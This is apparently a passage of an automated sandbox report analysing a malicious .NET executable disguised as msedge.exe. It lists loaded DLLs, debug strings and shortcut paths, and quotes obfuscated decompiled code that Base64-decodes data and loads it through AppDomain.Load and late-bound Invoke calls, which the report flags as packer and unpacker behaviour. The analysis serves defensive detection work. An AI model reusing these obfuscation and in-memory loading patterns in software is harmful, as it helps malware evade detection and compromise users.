Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: msedge.lnk.0.dr

LNK file: ..\..\..\..\..\..\Local\msedge.exe

Source: msedge.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: msedge.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb@w^ source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: .pdb. source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdbHm source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: symbols\dll\mscorlib.pdbpdb` source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Core.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\msedge.PDB7 source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp, WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Management.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: indoC:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.pdbx source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.pdbhG source: WER1A3A.tmp.dmp.14.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: msedge.exe, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: msedge.exe.0.dr, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])
